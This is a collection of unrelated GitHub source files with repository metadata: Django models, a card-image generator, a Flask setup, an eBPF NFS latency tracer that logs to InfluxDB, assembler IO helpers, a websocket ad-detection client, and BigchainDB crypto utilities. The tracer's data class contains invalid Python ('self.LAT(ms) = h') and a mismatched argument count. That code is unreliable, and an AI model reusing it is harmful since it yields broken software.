HSNCode=models.CharField(max_length=20,blank=True,null=True,verbose_name="HSN Code")
Quantity=models.IntegerField(verbose_name="Qty",null=True,blank=True)
Rate=models.DecimalField(max_digits=10,decimal_places=3,null=True,blank=True)
UOM=models.ForeignKey(UOM,on_delete=models.PROTECT,null=True,blank=True)
Disc=models.CharField(max_length=10,blank=True,null=True)
Taxable=models.DecimalField(max_digits=10,decimal_places=3,null=True,blank=True)
Tax=models.DecimalField(max_digits=10,decimal_places=3,null=True,blank=True)
CGST=models.DecimalField(max_digits=10,decimal_places=3,null=True,blank=True)
SGST=models.DecimalField(max_digits=10,decimal_places=3,null=True,blank=True)
IGST=models.DecimalField(max_digits=10,decimal_places=3,null=True,blank=True)
BaseQty=models.IntegerField(verbose_name="Base Qty",null=True,blank=True)
Amount=models.DecimalField(max_digits=10,decimal_places=3,null=True,blank=True)
def __str__(self):
return self.Item
class GSTwiseSummary(models.Model):
Id=models.IntegerField(auto_created=True,primary_key=True)
InvoiceNo=models.CharField(max_length=10,verbose_name="Invoice No",null=True,blank=True)
GSTAmnt=models.DecimalField(max_digits=10,decimal_places=3,verbose_name="GST Amount",null=True,blank=True)
CGSTAmnt=models.DecimalField(max_digits=10,decimal_places=3,verbose_name="CGST Amount",null=True,blank=True)
SGTAmnt=models.DecimalField(max_digits=10,decimal_places=3,verbose_name="SGST Amount",null=True,blank=True)
def __str__(self):
return self.InvoiceNo
class StockTable(models.Model):
Id=models.IntegerField(auto_created=True,primary_key=True)
ProductName=models.ForeignKey(Product,on_delete=models.CASCADE,null=True,blank=True)
StockQty=models.IntegerField(verbose_name="Stock Quantity",null=True,blank=True)
BaseUOM=models.ForeignKey(UOM,on_delete=models.PROTECT,null=True,blank=True)
def __str__(self):
return self.ProductName
|
[
"86987322+NeethuDavis1990@users.noreply.github.com"
] |
86987322+NeethuDavis1990@users.noreply.github.com
|
f5bdd285feb53c2fc3eb0e62e11362e06e099ff9
|
f6f7898c9b327c29484ca77b53f72b4700c3bc72
|
/build.py
|
7147852683f113d3da9df985023dd59fa2559723
|
[] |
no_license
|
yourcelf/flamewar
|
eb2f08c6420dd9f9bf3472a4135a89f7e7444f58
|
8b03b65876851da9170c37242fce8588221819b1
|
refs/heads/master
| 2021-01-11T11:00:54.789709
| 2013-04-09T16:29:31
| 2013-04-09T16:29:31
| 3,710,171
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,163
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from PIL import Image, ImageDraw, ImageFont
import yaml
BASE = os.path.dirname(__file__)
#FONT = "/usr/share/fonts/truetype/msttcorefonts/Courier_New.ttf"
#FONT = "/usr/share/fonts/truetype/msttcorefonts/Andale_Mono.ttf"
FONT = "/usr/share/fonts/truetype/ubuntu-font-family/UbuntuMono-R.ttf"
#FONT = "/usr/share/fonts/truetype/ttf-dejavu/DejaVuSansMono.ttf"
#FONT = "/usr/share/fonts/truetype/freefont/FreeSans.ttf"
#FONT = "/usr/share/fonts/truetype/ttf-liberation/LiberationMono-Regular.ttf"
class Card(object):
density = 300
def __init__(self, width=2.5, height=3.5):
self.im = Image.new(
'RGBA',
(int(width * self.density), int(height * self.density)),
(255, 255, 255, 255),
)
def draw_wrapped_text(self, text, boundaries, rev_indent="", par_height=1,
font_size=48,
font_path=FONT):
font = ImageFont.truetype(font_path, font_size)
x, y = [a * self.density for a in boundaries[0]]
mx, my = [a * self.density for a in boundaries[1]]
width = mx - x
ypos = y
paragraphs = text.split("\n")
draw = ImageDraw.Draw(self.im)
for par in paragraphs:
if not par.strip():
ypos += font.getsize("M")[1] * par_height
continue
words = par.split()
i = 0
while True:
if len(words) == 0:
break
fsize = font.getsize(" ".join(words[:i + 1]))
if fsize[0] > width or i >= len(words):
text = " ".join(words[:i])
draw.text((x, ypos), text, fill=(0, 0, 0), font=font)
ypos = ypos + fsize[1]
words = words[i:]
if rev_indent and len(words):
words[0] = rev_indent + words[0]
i = 0
i += 1
def load_background(self, filepath):
bg = Image.open(filepath).resize(self.im.size)
self.im.paste(bg, (0, 0) + self.im.size)
def save(self, filename, fmt=None):
return self.im.save(filename, fmt)
class GoalCard(Card):
def __init__(self, goal_type, goal, lights, *args, **kwargs):
super(GoalCard, self).__init__(*args, **kwargs)
self.load_background(os.path.join(BASE, "images", "goal.png"))
self.draw_wrapped_text(goal_type.upper(), ((0.32, 0.64), (2.22, 0.86)), font_size=48)
self.draw_wrapped_text(goal, ((0.33, 0.96), (2.25, 1.95)), font_size=40)
# Draw stars
rows = 2 if lights > 4 else 1
star = Image.open(os.path.join(BASE, "images", "light.png"))
star_dims = (0.25, 0.25)
box = ((0.29, 2.41), (2.25, 3.18))
start_x = box[0][0] + (box[1][0] - box[0][0]) / 2 - star_dims[0] * (lights/rows/2.0)
start_y = box[1][0] + (box[1][1] - box[1][0]) / 2 - star_dims[1] * (rows/2.0)
for r in range(rows):
for i in range(lights / rows):
dims = [int(self.density * a) for a in (
start_x + star_dims[0] * i,
start_y + star_dims[1] * r,
start_x + star_dims[0] * (i + 1),
start_y + star_dims[1] * (r + 1),
)]
self.im.paste(star, dims)
class BlankEmailCard(Card):
def __init__(self, *args, **kwargs):
super(BlankEmailCard, self).__init__(*args, **kwargs)
self.load_background(os.path.join(BASE, "images", "email.png"))
class EmailCard(BlankEmailCard):
def __init__(self, subject, message, lights, flames, *args, **kwargs):
super(EmailCard, self).__init__(*args, **kwargs)
self.draw_wrapped_text(str(flames), ((1.55, 0.18), (1.86, 0.39)), font_size=64)
self.draw_wrapped_text(str(lights), ((1.97, 0.18), (2.25, 0.39)), font_size=64)
self.draw_wrapped_text(subject, ((0.30, 0.43), (2.16, 1.59)), font_size=36)
self.draw_wrapped_text(message, ((0.27, 0.70), (2.27, 3.25)), font_size=36)
class InterruptCard(Card):
def __init__(self, title, description, *args, **kwargs):
super(InterruptCard, self).__init__(*args, **kwargs)
self.load_background(os.path.join(BASE, "images", "interrupt.png"))
self.draw_wrapped_text(title, ((0.25, 0.85), (2.25, 1.35)), font_size=64)
self.draw_wrapped_text(description, ((0.25, 1.35), (2.25, 3.25)), font_size=40)
class AttentionCard(Card):
def __init__(self, description, *args, **kwargs):
# Do this one landscape mode.
super(AttentionCard, self).__init__(*args, width=3.5, height=2.5, **kwargs)
self.load_background(os.path.join(BASE, "images", "attention.png"))
self.draw_wrapped_text(description, ((0.25, 0.85), (2.80, 2.25)), font_size=48)
self.im = self.im.rotate(90)
def build():
out = os.path.join(BASE, "cards")
try:
os.makedirs(out)
except OSError:
pass
with open("cards.yaml") as fh:
defs = yaml.load(fh)
count = 0
for goal_type, goalinfo in defs['goals'].items():
for card in goalinfo['cards']:
GoalCard(
lights=goalinfo['lights'],
goal_type=goal_type,
goal=card,
).save(
os.path.join(out, "goal-%02d.png" % count)
)
count += 1
count = 0
for email in defs['action']['email']:
EmailCard(**email).save(os.path.join(out, "email-%02d.png" % count))
count += 1
for i in range(5):
BlankEmailCard().save(os.path.join(out, "email-%02d.png" % count))
count += 1
count = 0
# Double-up on interrupt cards.
for i in range(2):
for interrupt in defs['action']['interrupt']:
InterruptCard(**interrupt).save(os.path.join(out, "interrupt-%02d.png" % count))
count += 1
count = 0
for attention in defs['attention']:
AttentionCard(attention).save(os.path.join(out, "attention-%02d.png" % count))
count += 1
if __name__ == "__main__":
build()
|
[
"cfd@media.mit.edu"
] |
cfd@media.mit.edu
|
4541dbb6e82625bb4cc57a6bb13dba1ce1c26d8b
|
7cef36e10852878a0fe525d36665f793352ae5db
|
/app/__init__.py
|
c2902175acb5cf8b080d21d472953df6c212c4ec
|
[] |
no_license
|
natusaspire/shop
|
b5e1efeaf64f39c60b324145a6d4eec88d6f49e7
|
ee266e529f6d1fd7dac82c10a78cdc7efbb04eb3
|
refs/heads/master
| 2020-03-23T03:42:44.446839
| 2018-07-15T17:23:41
| 2018-07-15T17:23:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 348
|
py
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from flask_bootstrap import Bootstrap
app = Flask(__name__)
app.config.from_object('config')
db = SQLAlchemy(app)
migrate = Migrate(app, db)
Bootstrap(app)
from app.shop.views import shop
app.register_blueprint(shop, url_prefix='/')
|
[
"natusaspire@gmail.com"
] |
natusaspire@gmail.com
|
c1d8da7543c92a89f99f832a1045b6f2083b754d
|
319221542ebea78162d240006851c0a9363ab5b0
|
/plugins/nfsslower.py
|
dedaf300c572519c3c4c8a757fd9c7cdafed67d7
|
[
"Apache-2.0"
] |
permissive
|
wuli133144/lmp
|
59e4f42b65bf9a4990e37adb1a7ac754b295f9e2
|
0007989c5a59bf58e462d2948fcf0779674ebef0
|
refs/heads/master
| 2023-08-29T16:09:17.487964
| 2021-10-13T16:09:27
| 2021-10-13T16:09:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,085
|
py
|
#!/usr/bin/python
# @lint-avoid-python-3-compatibility-imports
#
# nfsslower Trace slow NFS operations
# for Linux using BCC & eBPF
#
# Usage: nfsslower [-h] [-p PID] [min_ms]
#
# This script traces some common NFS operations: read, write, opens and
# getattr. It measures the time spent in these operations, and prints details
# for each that exceeded a threshold.
#
# WARNING: This adds low-overhead instrumentation to these NFS operations,
# including reads and writes from the file system cache. Such reads and writes
# can be very frequent (depending on the workload; eg, 1M/sec), at which
# point the overhead of this tool (even if it prints no "slower" events) can
# begin to become significant.
#
# Most of this code is copied from similar tools (ext4slower, zfsslower etc)
#
# By default, a minimum millisecond threshold of 10 is used.
#
# This tool uses kprobes to instrument the kernel for entry and exit
# information, in the future a preferred way would be to use tracepoints.
# Currently there aren't any tracepoints available for nfs_read_file,
# nfs_write_file and nfs_open_file, nfs_getattr does have entry and exit
# tracepoints but we chose to use kprobes for consistency
#
# 31-Aug-2017 Samuel Nair created this. Should work with NFSv{3,4}
from __future__ import print_function
from bcc import BPF
import argparse
from time import strftime
# for influxdb
from init_db import influx_client
from const import DatabaseType
from db_modules import write2db
from datetime import datetime
examples = """
./nfsslower # trace operations slower than 10ms
./nfsslower 1 # trace operations slower than 1ms
./nfsslower -j 1 # ... 1 ms, parsable output (csv)
./nfsslower 0 # trace all nfs operations
./nfsslower -p 121 # trace pid 121 only
"""
parser = argparse.ArgumentParser(
description="""Trace READ, WRITE, OPEN \
and GETATTR NFS calls slower than a threshold,\
supports NFSv{3,4}""",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=examples)
parser.add_argument("-j", "--csv", action="store_true",
help="just print fields: comma-separated values")
parser.add_argument("-p", "--pid", help="Trace this pid only")
parser.add_argument("min_ms", nargs="?", default='10',
help="Minimum IO duration to trace in ms (default=10ms)")
parser.add_argument("--ebpf", action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
min_ms = int(args.min_ms)
pid = args.pid
csv = args.csv
debug = 0
# data structure from template
class lmp_data(object):
def __init__(self,a,b,c,d,e,f,g,h,i,j):
self.time = a
self.glob = b
self.comm = c
self.PID = d
self.T = e
self.BYTES = f
self.OFF_KB = g
self.LAT(ms) = h
self.FILENAME = i
data_struct = {"measurement":'nfsslower',
"time":[],
"tags":['glob',],
"fields":['time','comm','PID','T','BYTES','OFF_KB','LAT(ms)','FILENAME']}
bpf_text = """
#include <uapi/linux/ptrace.h>
#include <linux/fs.h>
#include <linux/sched.h>
#include <linux/dcache.h>
#define TRACE_READ 0
#define TRACE_WRITE 1
#define TRACE_OPEN 2
#define TRACE_GETATTR 3
struct val_t {
u64 ts;
u64 offset;
struct file *fp;
struct dentry *d;
};
struct data_t {
// XXX: switch some to u32's when supported
u64 ts_us;
u64 type;
u64 size;
u64 offset;
u64 delta_us;
u64 pid;
char task[TASK_COMM_LEN];
char file[DNAME_INLINE_LEN];
};
BPF_HASH(entryinfo, u64, struct val_t);
BPF_PERF_OUTPUT(events);
int trace_rw_entry(struct pt_regs *ctx, struct kiocb *iocb,
struct iov_iter *data)
{
u64 id = bpf_get_current_pid_tgid();
u32 pid = id >> 32; // PID is higher part
if(FILTER_PID)
return 0;
// store filep and timestamp by id
struct val_t val = {};
val.ts = bpf_ktime_get_ns();
val.fp = iocb->ki_filp;
val.d = NULL;
val.offset = iocb->ki_pos;
if (val.fp)
entryinfo.update(&id, &val);
return 0;
}
int trace_file_open_entry (struct pt_regs *ctx, struct inode *inode,
struct file *filp)
{
u64 id = bpf_get_current_pid_tgid();
u32 pid = id >> 32; // PID is higher part
if(FILTER_PID)
return 0;
// store filep and timestamp by id
struct val_t val = {};
val.ts = bpf_ktime_get_ns();
val.fp = filp;
val.d = NULL;
val.offset = 0;
if (val.fp)
entryinfo.update(&id, &val);
return 0;
}
int trace_getattr_entry(struct pt_regs *ctx, struct vfsmount *mnt,
struct dentry *dentry, struct kstat *stat)
{
u64 id = bpf_get_current_pid_tgid();
u32 pid = id >> 32; // PID is higher part
if(FILTER_PID)
return 0;
struct val_t val = {};
val.ts = bpf_ktime_get_ns();
val.fp = NULL;
val.d = dentry;
val.offset = 0;
if (val.d)
entryinfo.update(&id, &val);
return 0;
}
static int trace_exit(struct pt_regs *ctx, int type)
{
struct val_t *valp;
u64 id = bpf_get_current_pid_tgid();
u32 pid = id >> 32; // PID is higher part
valp = entryinfo.lookup(&id);
if (valp == 0) {
// missed tracing issue or filtered
return 0;
}
// calculate delta
u64 ts = bpf_ktime_get_ns();
u64 delta_us = (ts - valp->ts) / 1000;
entryinfo.delete(&id);
if (FILTER_US)
return 0;
// populate output struct
u32 size = PT_REGS_RC(ctx);
struct data_t data = {.type = type, .size = size, .delta_us = delta_us,
.pid = pid};
data.ts_us = ts / 1000;
data.offset = valp->offset;
bpf_get_current_comm(&data.task, sizeof(data.task));
// workaround (rewriter should handle file to d_name in one step):
struct dentry *de = NULL;
struct qstr qs = {};
if(type == TRACE_GETATTR)
{
bpf_probe_read_kernel(&de,sizeof(de), &valp->d);
}
else
{
bpf_probe_read_kernel(&de, sizeof(de), &valp->fp->f_path.dentry);
}
bpf_probe_read_kernel(&qs, sizeof(qs), (void *)&de->d_name);
if (qs.len == 0)
return 0;
bpf_probe_read_kernel(&data.file, sizeof(data.file), (void *)qs.name);
// output
events.perf_submit(ctx, &data, sizeof(data));
return 0;
}
int trace_file_open_return(struct pt_regs *ctx)
{
return trace_exit(ctx, TRACE_OPEN);
}
int trace_read_return(struct pt_regs *ctx)
{
return trace_exit(ctx, TRACE_READ);
}
int trace_write_return(struct pt_regs *ctx)
{
return trace_exit(ctx, TRACE_WRITE);
}
int trace_getattr_return(struct pt_regs *ctx)
{
return trace_exit(ctx, TRACE_GETATTR);
}
"""
if min_ms == 0:
bpf_text = bpf_text.replace('FILTER_US', '0')
else:
bpf_text = bpf_text.replace('FILTER_US',
'delta_us <= %s' % str(min_ms * 1000))
if args.pid:
bpf_text = bpf_text.replace('FILTER_PID', 'pid != %s' % pid)
else:
bpf_text = bpf_text.replace('FILTER_PID', '0')
if debug or args.ebpf:
print(bpf_text)
if args.ebpf:
exit()
# process event
def print_event(cpu, data, size):
event = b["events"].event(data)
type = 'R'
if event.type == 1:
type = 'W'
elif event.type == 2:
type = 'O'
elif event.type == 3:
type = 'G'
if(csv):
print("%d,%s,%d,%s,%d,%d,%d,%s" % (
event.ts_us, event.task, event.pid, type, event.size,
event.offset, event.delta_us, event.file))
return
test_data = lmp_data(datetime.now().isoformat(),'glob',event.task.decode('utf-8', 'replace'), event.pid, type, event.size,event.offset / 1024, float(event.delta_us) / 1000,event.file.decode('utf-8', 'replace'))
write2db(data_struct, test_data, influx_client, DatabaseType.INFLUXDB.value)
# print("%-8s %-14.14s %-6s %1s %-7s %-8d %7.2f %s" %
# (strftime("%H:%M:%S"),
# event.task.decode('utf-8', 'replace'),
# event.pid,
# type,
# event.size,
# event.offset / 1024,
# float(event.delta_us) / 1000,
# event.file.decode('utf-8', 'replace')))
# Currently specifically works for NFSv4, the other kprobes are generic
# so it should work with earlier NFS versions
b = BPF(text=bpf_text)
b.attach_kprobe(event="nfs_file_read", fn_name="trace_rw_entry")
b.attach_kprobe(event="nfs_file_write", fn_name="trace_rw_entry")
b.attach_kprobe(event="nfs4_file_open", fn_name="trace_file_open_entry")
b.attach_kprobe(event="nfs_file_open", fn_name="trace_file_open_entry")
b.attach_kprobe(event="nfs_getattr", fn_name="trace_getattr_entry")
b.attach_kretprobe(event="nfs_file_read", fn_name="trace_read_return")
b.attach_kretprobe(event="nfs_file_write", fn_name="trace_write_return")
b.attach_kretprobe(event="nfs4_file_open", fn_name="trace_file_open_return")
b.attach_kretprobe(event="nfs_file_open", fn_name="trace_file_open_return")
b.attach_kretprobe(event="nfs_getattr", fn_name="trace_getattr_return")
if(csv):
print("ENDTIME_us,TASK,PID,TYPE,BYTES,OFFSET_b,LATENCY_us,FILE")
else:
if min_ms == 0:
print("Tracing NFS operations... Ctrl-C to quit")
else:
print("""Tracing NFS operations that are slower than \
%d ms... Ctrl-C to quit"""
% min_ms)
print("%-8s %-14s %-6s %1s %-7s %-8s %7s %s" % ("TIME",
"COMM",
"PID",
"T",
"BYTES",
"OFF_KB",
"LAT(ms)",
"FILENAME"))
b["events"].open_perf_buffer(print_event, page_cnt=64)
while 1:
try:
b.perf_buffer_poll()
except KeyboardInterrupt:
exit()
|
[
"1312945441@qq.com"
] |
1312945441@qq.com
|
718c62eeccf0f11bb86cb779a70c8baebb6c6d22
|
66276c6773b1c92f4d5c20a69c3cf8720ddb86ca
|
/07/Project7Template/Project7IO.py
|
8eae7cb0a8012d5d8db69c1a993fcda89070fe21
|
[] |
no_license
|
duffrind/ComputerArch
|
f5617dc835673da3f922ce4034b069059e88dc9a
|
9ee2034bb993ae7d1e37dd3077b564eac48298d7
|
refs/heads/master
| 2020-06-28T15:56:57.536061
| 2016-11-22T16:28:23
| 2016-11-22T16:28:23
| 74,491,534
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,270
|
py
|
import sys
inputsofar = []
inputfile = ""
nextidx = 0
def setFile(fname):
global inputfile, nextidx, inputsofar
inputfile = open(fname, "r")
nextidx = 0
inputsofar = []
def setSaveFile(path):
sys.stdout.close()
sys.stdout = open(path,"w")
def rewind():
global nextidx
nextidx = 0
def nextLine():
global nextidx, inputsofar, inputfile
if nextidx < len(inputsofar):
nextidx = nextidx+1
return inputsofar[nextidx-1]
elif len(inputsofar) > 0 and inputsofar[-1] == "EOF":
return "EOF"
else:
line = ""
while True:
if inputfile == "":
line = input()
else:
line = inputfile.readline()
if line.strip()[0:2] != "//" and (len(line) == 0 or line.strip()!="") :
break
if line == "":
line = "EOF"
if line.find("//") != -1:
line = line[0:line.find("//")]
line = line.strip()
inputsofar.append(line.strip())
nextidx = nextidx+1
return line.strip()
def printAddress(s):
print(bin(int(s))[2:].zfill(16))
def printCommand(f,c,d,j):
print(f, end="")
print(c, end="")
print(d, end="")
print(j)
|
[
"duffrind@uwplatt.edu"
] |
duffrind@uwplatt.edu
|
8820cf9efc88709ad693aef34b203b303d802d0d
|
ae9345588b78d96444a81f9d70a1811b20880941
|
/update_handler.py
|
d031515143f5ea9a11ec228b4fd1d1ccb95b2432
|
[] |
no_license
|
Honigchnuschperli/WerbeSkip
|
91d905d2d890eba6309fc7a531f9ac8f91536af2
|
3c972ebd16a40b034f8811a40434f0c410563beb
|
refs/heads/master
| 2020-04-07T16:57:55.410698
| 2018-11-20T22:00:04
| 2018-11-20T22:00:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,909
|
py
|
from deepnet import Network
import numpy as np
from deepnet.functions.costs import CrossEntropyCost
from helperfunctions.image_processing.retrieving_images import VideoCapture
from deepnet.layers import FullyConnectedLayer, BatchNorm, Dropout, ReLU, SoftMax, ConvolutionLayer, MaxPoolLayer, \
Flatten
from deepnet.optimizers import Adam
import json
import websockets
import asyncio
from settings_secret import websocket_token
import warnings
import os
class WerbeSkip(object):
def __init__(self):
self.PATH_TO_NET = os.path.join(os.path.dirname(__file__),
"helperfunctions/prosieben/networks/teleboy/teleboy_old.h5")
self.ws = None
self.loop = None
self.network = self.init_network()
self.docker = bool(os.environ.get("DJANGO_DEBUG", False))
if self.docker:
self.ip = "104.248.102.130:80"
else:
self.ip = "127.0.0.1:8000"
# Prosieben: 354
# SRF: 303
self.cap = VideoCapture(channel=354, colour=False, rate_limit=1, convert_network=True, proxy=True, use_hash=False)
self.filters = []
self.result = []
self.predictions = []
self.filter_size = 25
self.chain_size = 5
def init_network(self):
net = Network()
net.input((1, 180, 320))
net.add(
ConvolutionLayer(n_filter=16, width_filter=12, height_filter=8, stride=4, zero_padding=0, padding_value=1))
net.add(BatchNorm())
net.add(ReLU())
net.add(
ConvolutionLayer(n_filter=64, width_filter=6, height_filter=4, stride=1, zero_padding=2, padding_value=1))
net.add(BatchNorm())
net.add(ReLU())
net.add(MaxPoolLayer(width_filter=3, height_filter=3, stride=2))
net.add(ConvolutionLayer(n_filter=128, width_filter=4, height_filter=4, stride=1))
net.add(BatchNorm())
net.add(ReLU())
net.add(ConvolutionLayer(n_filter=128, width_filter=3, height_filter=3, stride=2))
net.add(BatchNorm())
net.add(ReLU())
net.add(ConvolutionLayer(n_filter=256, width_filter=3, height_filter=3, stride=1))
net.add(BatchNorm())
net.add(Dropout(0.75))
net.add(Flatten())
net.add(FullyConnectedLayer(512))
net.add(BatchNorm())
net.add(ReLU())
net.add(Dropout(0.5))
net.add(FullyConnectedLayer(2))
net.add(SoftMax())
optimizer = Adam(learning_rate=0.001)
net.regression(optimizer=optimizer, cost=CrossEntropyCost())
net.load(self.PATH_TO_NET)
return net
async def init_db(self, websocket):
message = {"command": "init", "channel": {"Prosieben": {"id": 354}}, "token": websocket_token}
await websocket.send(json.dumps(message))
async def producer_handler(self, websocket):
while True:
message = self.producer()
await websocket.send(json.dumps(message))
def producer(self):
channel = self.get_prediction()
message = {"command": "update", "room": 'main', "channel": channel, "token": websocket_token}
return message
def get_prediction(self):
img = next(self.cap)
prediction = self.network.feedforward(img)
self.predictions.append(prediction[0, 1])
snippet = self.predictions[-self.filter_size:]
if np.any(np.array(snippet) > 0.9): # checks if network is sure that it found a logo
self.filters.append(1)
else:
self.filters.append(0)
last_filter = self.filters[-1]
if np.all(np.array(self.filters[-self.chain_size:]) == last_filter): # checks if the last values are the same
if last_filter == 1:
if np.mean(self.predictions[-self.chain_size:]) > 0.9:
self.result.append(last_filter)
else:
self.result.append(self.result[-1])
else:
self.result.append(last_filter)
else:
self.result.append(self.result[-1])
self.clean_up()
return {"Prosieben": {"ad": self.result[-1], "id": 354}}
def clean_up(self):
if len(self.predictions) > 2 * self.filter_size and len(self.filters) > 2 * self.chain_size:
self.filters.pop(0)
self.result.pop(0)
self.predictions.pop(0)
async def consumer_handler(self, websocket):
while True:
async for message in websocket:
await self.consumer(message)
asyncio.sleep(0)
def consumer(self, message):
error = json.loads(message).get('error', None)
if error:
print('GOT ERROR FROM SOCKET:', error)
async def handler(self, websocket):
consumer_task = asyncio.ensure_future(self.consumer_handler(websocket))
producer_task = asyncio.ensure_future(self.producer_handler(websocket))
done, pending = await asyncio.wait(
[consumer_task, producer_task],
return_when=asyncio.FIRST_COMPLETED,
)
for task in pending:
task.cancel()
def run(self):
async def hello():
async with websockets.connect('ws://' + self.ip + '/chat/stream/') as websocket:
print("connected")
await self.init_db(websocket)
await self.handler(websocket)
print("starting")
self.loop = asyncio.get_event_loop()
self.loop.run_until_complete(hello())
if __name__ == "__main__":
try:
x = WerbeSkip()
x.run()
finally:
x.cap.pipe.kill() # not sure if pipe still runs after it shuts down or the programm exits
x.cap.m3u8_update_thread.stop() # stopping gracefully
x.cap.get_images_thread.stop() # stopping gracefully
print("exit")
|
[
"georg.schwan@edubs.ch"
] |
georg.schwan@edubs.ch
|
06aa92289a08745e863072806861d725ea5fcb94
|
402c2dfec6fd00be0e4bce7248b3b22eec504c80
|
/Enterprise/BlockChain/Server/bigchaindb/bigchaindb/common/crypto.py
|
a8e42c52b7882ddb11ebe3e753e8a7d19ce62071
|
[
"CC-BY-4.0",
"Apache-2.0",
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
NP-compete/Alternate-Authentication
|
7d81b8faaafe60470100140110023992cbb5d0dc
|
b2a04ecbc57292c2c87293458cc1931ab47f43f2
|
refs/heads/master
| 2022-12-21T15:47:24.349972
| 2021-04-06T13:07:56
| 2021-04-06T13:07:56
| 179,950,584
| 12
| 6
|
MIT
| 2022-12-09T19:33:50
| 2019-04-07T10:35:26
|
Python
|
UTF-8
|
Python
| false
| false
| 1,847
|
py
|
# Copyright BigchainDB GmbH and BigchainDB contributors
# SPDX-License-Identifier: (Apache-2.0 AND CC-BY-4.0)
# Code is Apache-2.0 and docs are CC-BY-4.0
# Separate all crypto code so that we can easily test several implementations
from collections import namedtuple
import sha3
from cryptoconditions import crypto
CryptoKeypair = namedtuple('CryptoKeypair', ('private_key', 'public_key'))
def hash_data(data):
"""Hash the provided data using SHA3-256"""
return sha3.sha3_256(data.encode()).hexdigest()
def generate_key_pair():
"""Generates a cryptographic key pair.
Returns:
:class:`~bigchaindb.common.crypto.CryptoKeypair`: A
:obj:`collections.namedtuple` with named fields
:attr:`~bigchaindb.common.crypto.CryptoKeypair.private_key` and
:attr:`~bigchaindb.common.crypto.CryptoKeypair.public_key`.
"""
# TODO FOR CC: Adjust interface so that this function becomes unnecessary
return CryptoKeypair(
*(k.decode() for k in crypto.ed25519_generate_key_pair()))
PrivateKey = crypto.Ed25519SigningKey
PublicKey = crypto.Ed25519VerifyingKey
def key_pair_from_ed25519_key(hex_private_key):
"""Generate base58 encode public-private key pair from a hex encoded private key"""
priv_key = crypto.Ed25519SigningKey(bytes.fromhex(hex_private_key)[:32], encoding='bytes')
public_key = priv_key.get_verifying_key()
return CryptoKeypair(private_key=priv_key.encode(encoding='base58').decode('utf-8'),
public_key=public_key.encode(encoding='base58').decode('utf-8'))
def public_key_from_ed25519_key(hex_public_key):
"""Generate base58 public key from hex encoded public key"""
public_key = crypto.Ed25519VerifyingKey(bytes.fromhex(hex_public_key), encoding='bytes')
return public_key.encode(encoding='base58').decode('utf-8')
|
[
"soham.dutta.analyst@gmail.com"
] |
soham.dutta.analyst@gmail.com
|
fce35982f9723fe77d4de5712ed7ee3235d59e20
|
b89c89c2bb13e6c642af3fb71e482a60f1291c2c
|
/loss_metrics/loss_and_metrics.py
|
079747b39d9337b5824e4fe73ba367277ee22acd
|
[] |
no_license
|
fang-h/lane-segmentation
|
0357698ddcec73d085d4dcd9ea1a652a83f053ed
|
523169d9c2edec3389eea6ad26c67b08beb1b512
|
refs/heads/master
| 2021-01-02T19:46:04.130520
| 2020-04-02T01:22:13
| 2020-04-02T01:22:13
| 239,772,067
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,139
|
py
|
"""use CrossEntropy Loss as the cost loss for class every pixel,
and use miou as the metrics to evaluate the performance of the model"""
import torch.nn as nn
import numpy as np
class Loss(nn.Module):
def __init__(self, num_classes):
super(Loss, self).__init__()
self.num_classes = num_classes
def forward(self, input, target):
# convert to [N, C]
if input.dim() > 2:
input = input.view(input.size(0), input.size(1), -1)
input = input.transpose(1, 2)
input = input.contiguous().view(-1, self.num_classes)
# convert to [N]
target = target.view(-1)
return nn.CrossEntropyLoss(reduction='mean')(input, target)
def compute_iou(pred, gt, result):
pred = pred.numpy()
gt = gt.numpy()
for i in range(8):
single_gt = gt == i
single_pred = pred == i
temp1 = np.sum(single_gt * single_pred) # compute the intersection
temp2 = np.sum(single_pred) + np.sum(single_gt) - temp1 # compute the union
result["intersection"][i] += temp1
result["union"][i] += temp2
return result
|
[
"2901765507@qq.com"
] |
2901765507@qq.com
|
d159b9494bfd77cbe888a1b6d648d4096b59556c
|
ef27ed447844a366b4d07edceee720ab82b746dd
|
/django_project/django_project/urls.py
|
d244d6a059eaf280013502b7d369e17c483f9574
|
[] |
no_license
|
Achyuthkodali/django_venv_3
|
e896ffca774d6d1977046140321b394009e959bd
|
712c9ddaa88ecf41f663d5b888eb46fc752dd3c5
|
refs/heads/master
| 2020-03-26T18:18:05.772674
| 2018-08-18T09:16:37
| 2018-08-18T09:16:37
| 145,206,500
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 950
|
py
|
"""django_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
from .views import *
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^login_auth', check_login),
url(r'^register_auth', check_register)
]
|
[
"achyuth.kodali97@gmail.com"
] |
achyuth.kodali97@gmail.com
|
7247f79d3ab7ff01f1865f3f995792b09337f488
|
562729b6bd37293bf2dd0303dd52234dde70c3fd
|
/kinlin/core/project.py
|
a1812fa8fd13331ae78df31ba3c23b17f9074bb6
|
[
"MIT"
] |
permissive
|
the-lay/kinlin
|
887fc97abbbefc14a59ac5096ece713b421a4051
|
ce7c95d46d130049e356104ba77fad51bc59fb3f
|
refs/heads/master
| 2022-02-26T08:46:31.261367
| 2019-10-19T23:20:55
| 2019-10-19T23:20:55
| 211,645,782
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 844
|
py
|
from typing import List
from .utils import *
